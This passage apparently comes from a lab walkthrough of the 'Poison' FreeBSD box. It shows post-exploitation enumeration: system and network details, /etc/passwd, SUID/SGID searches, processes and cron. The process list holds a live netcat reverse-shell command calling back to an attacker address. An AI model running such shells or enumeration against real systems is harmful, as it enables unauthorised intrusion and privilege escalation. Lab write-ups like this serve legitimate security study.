Since I was able to skip the lateral movement by directly SSH into the target system as the charix user, I will proceed the post enumeration as the user
System/Kernel
charix@poison:~ % file /bin/sh ; uname -a ; freebsd-version
/bin/sh: ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.1, FreeBSD-style, stripped
freebsd poison 11.1-release freebsd 11.1-release #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
11.1-RELEASEFreeBSD 11.1-RELEASE
x86-64
Networks
charix@Poison:~ % netstat -anup tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.10.52802 ESTABLISHED
tcp4 0 0 10.10.10.84.33683 10.10.14.10.9999 ESTABLISHED
tcp4 0 0 10.10.10.84.80 10.10.14.10.44304 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTENcharix@Poison:~ % netstat -anup udp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
udp4 0 0 *.514 *.*
udp6 0 0 *.514 *.* 127.0.0.1.25
127.0.0.1.5801
127.0.0.1.5901
Users & Groups
charix@poison:~ % cat /etc/passwd ; ls -lasht /home
# $freebsd: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
total 12
4 drwxr-xr-x 20 root wheel 1.0k oct 21 15:13 ..
4 drwxr-x--- 2 charix charix 512B Mar 19 2018 charix
4 drwxr-xr-x 3 root wheel 512B Mar 19 2018 .SUIDs
charix@Poison:~ % find / -perm -04000 -ls -type f
1291628 56 -r-sr-xr-x 1 root wheel 26736 Jul 21 2017 /usr/sbin/traceroute6
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf-noip
1291723 72 -r-sr-xr-x 1 root wheel 32808 Jul 21 2017 /usr/sbin/traceroute
1291767 48 -r-sr-xr-x 1 root wheel 21512 Jul 21 2017 /usr/sbin/timedc
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf
1291776 960 -r-sr-xr-- 1 root network 433872 Jul 21 2017 /usr/sbin/ppp
1291557 16 -r-sr-xr-- 1 root mail 7424 Jul 21 2017 /usr/libexec/dma-mbox-create
1291579 16 -r-sr-xr-x 1 root wheel 6232 Jul 21 2017 /usr/libexec/ulog-helper
1291584 96 -r-sr-xr-x 1 root wheel 49152 Jul 21 2017 /usr/libexec/ssh-keysign
1291140 72 -r-sr-sr-x 1 root daemon 34368 Jul 21 2017 /usr/bin/lpq
1291148 32 -r-sr-xr-x 1 root wheel 16216 Jul 21 2017 /usr/bin/rlogin
1291200 72 -r-sr-sr-x 1 root daemon 33072 Jul 21 2017 /usr/bin/lprm
1291235 88 -r-sr-sr-x 1 root daemon 41248 Jul 21 2017 /usr/bin/lpr
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/at
1291255 72 -r-sr-xr-x 1 root wheel 33288 Jul 21 2017 /usr/bin/crontab
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/atrm
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/atq
1291311 40 -r-sr-xr-x 1 root wheel 17584 Jul 21 2017 /usr/bin/su
1291316 56 -r-sr-xr-x 1 root wheel 25488 Jul 21 2017 /usr/bin/chpass
1291325 32 -r-sr-xr-x 1 root wheel 16264 Jul 21 2017 /usr/bin/quota
1291337 24 -r-sr-xr-x 1 root wheel 9856 Jul 21 2017 /usr/bin/passwd
1291388 16 -r-sr-xr-x 1 root wheel 7256 Jul 21 2017 /usr/bin/opieinfo
1291394 56 -r-sr-xr-x 1 root wheel 26040 Jul 21 2017 /usr/bin/login
1291254 64 -r-sr-xr-x 4 root wheel 29016 Jul 21 2017 /usr/bin/batch
1291457 32 -r-sr-xr-x 1 root wheel 14304 Jul 21 2017 /usr/bin/opiepasswd
1291470 24 -r-sr-xr-x 1 root wheel 11600 Jul 21 2017 /usr/bin/lock
1291523 24 -r-sr-xr-x 1 root wheel 12192 Jul 21 2017 /usr/bin/rsh
1382703 4352 -r-sr-xr-x 1 root wheel 2191384 Jan 2 2018 /usr/local/bin/Xorg
1469407 104 -rwsr-x--- 1 root messagebus 49416 Jan 2 2018 /usr/local/libexec/dbus-daemon-launch-helper
561818 48 -r-sr-xr-x 1 root wheel 20912 Jul 21 2017 /bin/rcp
722311 80 -r-sr-xr-x 1 root wheel 40752 Jul 21 2017 /sbin/ping6
722342 32 -r-sr-xr-- 2 root operator 15904 Jul 21 2017 /sbin/poweroff
722376 24 -r-sr-xr-- 1 root operator 10600 Jul 21 2017 /sbin/mksnap_ffs
722342 32 -r-sr-xr-- 2 root operator 15904 Jul 21 2017 /sbin/shutdown
722402 64 -r-sr-xr-x 1 root wheel 32488 Jul 21 2017 /sbin/pingSGIDs
charix@poison:~ % find / -perm -02000 -ls -type f
1291625 24 -r-xr-sr-x 1 root kmem 11800 Jul 21 2017 /usr/sbin/trpt
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf-noip
1291650 48 -r-sr-sr-x 2 root authpf 24312 Jul 21 2017 /usr/sbin/authpf
1291818 120 -r-xr-sr-x 1 root daemon 59800 Jul 21 2017 /usr/sbin/lpc
1369407 1536 -r-xr-sr-x 1 root smmsp 729800 Jul 21 2017 /usr/libexec/sendmail/sendmail
1291586 128 -r-xr-sr-x 1 root mail 63088 Jul 21 2017 /usr/libexec/dma
1291140 72 -r-sr-sr-x 1 root daemon 34368 Jul 21 2017 /usr/bin/lpq
1291200 72 -r-sr-sr-x 1 root daemon 33072 Jul 21 2017 /usr/bin/lprm
1291204 32 -r-xr-sr-x 1 root kmem 13840 Jul 21 2017 /usr/bin/btsockstat
1291235 88 -r-sr-sr-x 1 root daemon 41248 Jul 21 2017 /usr/bin/lpr
1291343 24 -r-xr-sr-x 1 root tty 12280 Jul 21 2017 /usr/bin/write
1291393 304 -r-xr-sr-x 1 root kmem 154448 Jul 21 2017 /usr/bin/netstat
1291416 32 -r-xr-sr-x 1 root tty 15984 Jul 21 2017 /usr/bin/wallProcesses
charix@Poison:~ % ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 11 100.0 0.0 0 16 - RL 15:13 56:41.55 [idle]
root 0 0.0 0.0 0 160 - DLs 15:13 0:00.01 [kernel]
root 1 0.0 0.1 5408 1040 - ILs 15:13 0:00.00 /sbin/init --
[...]
root 319 0.0 0.5 9560 5052 - Ss 15:13 0:00.16 /sbin/devd
root 390 0.0 0.2 10500 2448 - Ss 15:13 0:00.06 /usr/sbin/syslogd -s
root 543 0.0 0.5 56320 5396 - S 15:13 0:02.13 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr
root 620 0.0 0.7 57812 7052 - Is 15:13 0:00.00 /usr/sbin/sshd
root 625 0.0 1.1 99172 11516 - Ss 15:14 0:00.10 /usr/local/sbin/httpd -DNOHTTPACCEPT
[...]
root 643 0.0 0.6 20636 6140 - Ss 15:15 0:00.05 sendmail: accepting connections (sendmail)
smmsp 646 0.0 0.6 20636 5808 - Is 15:16 0:00.00 sendmail: Queue runner@00:30:00 for /var/spool/clientmqueue (sendmail)
root 650 0.0 0.2 12592 2436 - Ss 15:16 0:00.01 /usr/sbin/cron -s
www 755 0.0 0.3 13180 2664 - I 15:40 0:00.00 sh -c mkfifo /tmp/ochtcw; nc 10.10.14.10 9999 0</tmp/ochtcw | /bin/sh >/tmp
www 758 0.0 0.3 13180 2672 - I 15:40 0:00.00 /bin/sh
www 764 0.0 0.3 13180 2668 - I 15:42 0:00.00 /bin/sh
root 783 0.0 0.8 85228 7840 - Is 15:51 0:00.02 sshd: charix [priv] (sshd)
charix 786 0.0 0.8 85228 7840 - S 15:52 0:00.11 sshd: charix@pts/1 (sshd)
root 529 0.0 0.9 23620 8868 v0- I 15:13 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xa
root 540 0.0 0.7 67220 7064 v0- I 15:13 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 541 0.0 0.5 37620 5312 v0- I 15:13 0:00.01 twm
root 697 0.0 0.2 10484 2076 v0 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv0
root 698 0.0 0.2 10484 2076 v1 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv1
root 699 0.0 0.2 10484 2076 v2 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv2
root 700 0.0 0.2 10484 2076 v3 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv3
root 701 0.0 0.2 10484 2076 v4 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv4
root 702 0.0 0.2 10484 2076 v5 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv5
root 703 0.0 0.2 10484 2076 v6 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv6
root 704 0.0 0.2 10484 2076 v7 Is+ 15:16 0:00.00 /usr/libexec/getty Pc ttyv7
root 565 0.0 0.4 19660 3616 0 Is+ 15:13 0:00.01 -csh (csh)
charix 787 0.0 0.4 19660 3828 1 Ss 15:52 0:00.06 -csh (csh)
charix 903 0.0 0.3 21208 2652 1 R+ 16:10 0:00.00 ps -auxCron
charix@poison:~ % crontab -l ; cat /etc/crontab
croncno crontab for charix
# /etc/crontab - root's crontab for FreeBSD
#
# $freebsd: releng/11.1/etc/crontab 194170 2009-06-14 06:37:19Z brian $
#
SHELL=/bin/sh
path=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a1,31 0-5 * * * root adjkerntz -a